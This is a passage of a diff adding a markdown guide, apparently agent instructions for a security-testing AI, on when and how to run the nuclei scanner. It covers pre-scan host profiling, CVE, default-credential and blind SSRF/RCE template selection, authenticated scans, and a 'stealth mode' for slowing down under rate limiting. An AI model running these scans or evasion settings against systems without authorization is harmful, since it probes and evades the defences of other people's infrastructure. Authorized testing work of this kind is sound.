+ ✗ nuclei -l output/live_hosts.txt -t http/ (bulk + all templates)
47
+ ✗ nuclei -u target.com -t http/ (whole category without justification)
48
+ ✗ nuclei on any URL from crawler output without reading what it does first
49
+
50
+ ---
51
+
52
+ ## MANDATORY PRE-CONDITIONS (Full Recon mode only)
53
+
54
+ Before nuclei can be used in a FULL RECON engagement, all must be satisfied:
55
+
56
+ [ ] The host has been manually visited in the browser — you have seen what the application does.
57
+ [ ] The technology stack is confirmed from observed evidence (response headers, JS, error pages).
58
+ [ ] At least 3 distinct endpoints have been manually probed and their behavior documented.
59
+ [ ] output/host_profiles.json contains a complete profile for this specific host.
60
+ [ ] You have selected a specific template category that matches the CONFIRMED tech stack.
61
+
62
+ If any condition is unmet: do NOT use nuclei. Continue manual analysis until conditions are met.
63
+
64
+ USING NUCLEI WITHOUT A HOST PROFILE IN FULL RECON MODE IS A TASK FAILURE.
65
+
66
+ IF YOU ARE STUCK trying to satisfy these conditions and the user asked for a SPECIFIC TASK (not full recon), re-read "SPECIFIC TASK FAST PATH" above and proceed accordingly.
67
+
68
+ ---
69
+
70
+ ## What Nuclei Is Good At (After Manual Analysis)
71
+
72
+ Once you understand the target, nuclei excels at:
73
+
74
+ - Confirming suspected misconfigurations already identified via manual observation
75
+ - Fingerprinting exact versions of a known framework (use technology templates)
76
+ - Checking for known CVEs in a framework version you have already identified
77
+ - Detecting blind/OOB vulnerabilities (SSRF, RCE) at specific endpoints you have already mapped
78
+ - Testing specific vulnerability classes against endpoints you have manually found and understood
79
+
80
+ What nuclei is BAD at (and must NOT be used for):
81
+ - Replacing manual application understanding
82
+ - Discovering what an application does (that is browser + curl's job)
83
+ - Bulk-scanning a list of unknown hosts to "see what comes up"
84
+
85
+ ---
86
+
87
+ ## Template Selection — Context Required
88
+
89
+ Template categories and their mandatory prerequisites:
90
+
91
+ TECHNOLOGY FINGERPRINTING (http/technologies/)
92
+ Prerequisite: You suspect a specific framework but need version confirmation.
93
+ Use: After manually identifying the framework from headers or JS.
94
+ Select: Only templates matching the confirmed framework name.
95
+
96
+ MISCONFIGURATION DETECTION (http/misconfiguration/)
97
+ Prerequisite: You have observed behavior suggesting a misconfiguration (e.g., directory listing,
98
+ exposed config endpoint, CORS wildcard in response header you read manually).
99
+ Use: To confirm and document a suspected misconfiguration.
100
+ Select: Only templates relevant to the specific misconfiguration type observed.
101
+
102
+ CVE SCANNING (http/vulnerabilities/, cves/)
103
+ Prerequisite: You have confirmed the exact software name AND version from real evidence.
104
+ Use: To check if the confirmed version is affected by specific CVEs.
105
+ Select: Only CVE templates for the confirmed software + version. Never run all CVE templates.
106
+
107
+ OOB / BLIND DETECTION (tags: oast, ssrf, rce)
108
+ Prerequisite: You have a specific endpoint or parameter that you manually identified as a
109
+ potential blind injection point. You have an active interactsh listener running.
110
+ Use: To confirm blind behavior at a SPECIFIC known endpoint — not across all URLs.
111
+ Select: Only templates matching the injection class you suspect at that specific endpoint.
112
+
113
+ DEFAULT CREDENTIALS / LOGIN PANELS (http/default-logins/, tags: panel)
114
+ Prerequisite: You have manually confirmed a login panel exists at a specific path.
115
+ Use: To check for default credentials on that specific panel type (e.g., confirmed Grafana login).
116
+ Select: Only templates for the confirmed panel software.
117
+
118
+ DNS / NETWORK / SSL (dns/, network/, ssl/)
119
+ Prerequisite: You have resolved hostnames and understand the infrastructure.
120
+ Use: For domain takeover checks on subdomains showing NXDOMAIN on CNAME targets,
121
+ or TLS misconfiguration checks after port scanning confirms HTTPS services.
122
+ Select: Appropriate category only.
123
+
124
+ ---
125
+
126
+ ## Usage Pattern (After Pre-Conditions Are Met)
127
+
128
+ The correct pattern is: SPECIFIC TARGET + SPECIFIC TEMPLATES — not lists + all templates.
129
+
130
+ Targeting a single confirmed host with confirmed tech:
131
+ nuclei -u <specific_host> -t http/technologies/<confirmed_framework>.yaml
132
+
133
+ Targeting a specific endpoint with confirmed vulnerability class:
134
+ nuclei -u <specific_url_with_params> -t http/vulnerabilities/<class>/
135
+
136
+ Targeting confirmed CVE on confirmed software version:
137
+ nuclei -u <specific_host> -id <cve-id>
138
+
139
+ Authenticated scan on a confirmed authenticated surface:
140
+ nuclei -u <specific_host> -H "Authorization: Bearer <token>" -t http/misconfiguration/
141
+
142
+ Stealth mode when target shows rate limiting behavior:
143
+ Add: -rl 5 -c 2 -delay 3
144
+
145
+ NEVER use these patterns:
146
+ nuclei -l output/live_hosts.txt (no template filter, no prior analysis)
147
+ nuclei -l output/live_hosts.txt -t http/ (entire category on unknown hosts)
148
+ nuclei -l output/urls_all_deduped.txt (raw crawler output as scanner input)
149
+
150
+ ---
151
+
152
+ ## Output and Triage
153
+
154
+ Write output: -o output/nuclei_<context>.txt (e.g., nuclei_grafana_cve.txt)
155
+ For JSON output: -json -o output/nuclei_<context>.json
156
+
157
+ After nuclei completes:
158
+ 1. Read every finding manually — do NOT accept nuclei output as confirmed vulnerability.
159
+ 2. For every finding marked [medium] or above: manually reproduce it with curl or browser.
160
+ 3. Only escalate to create_vulnerability_report after manual verification with working PoC.
161
+ 4. Discard informational findings unless they inform a manual attack chain.
162
+
163
+ A nuclei finding is NOT a vulnerability. It is a signal that requires manual verification.
164
+
165
+ ---
166
+
167
+ ## Workflow Integration (Where Nuclei Fits)
168
+
169
+ Phase 1 (Manual Profiling): DO NOT use nuclei.
170
+ Phase 2 (Bespoke Expansion): Nuclei may be used ONLY for fingerprinting confirmed frameworks.
171
+ Phase 3+ (Logic & Auth Testing): Nuclei may support OOB blind detection at specific endpoints.
172
+ Phase 4+ (Vulnerability Chaining): Nuclei may confirm suspected CVEs on confirmed versions.
173
+
174
+ Nuclei is a supporting instrument for hypotheses formed through manual analysis.
175
+ It is never the primary discovery mechanism.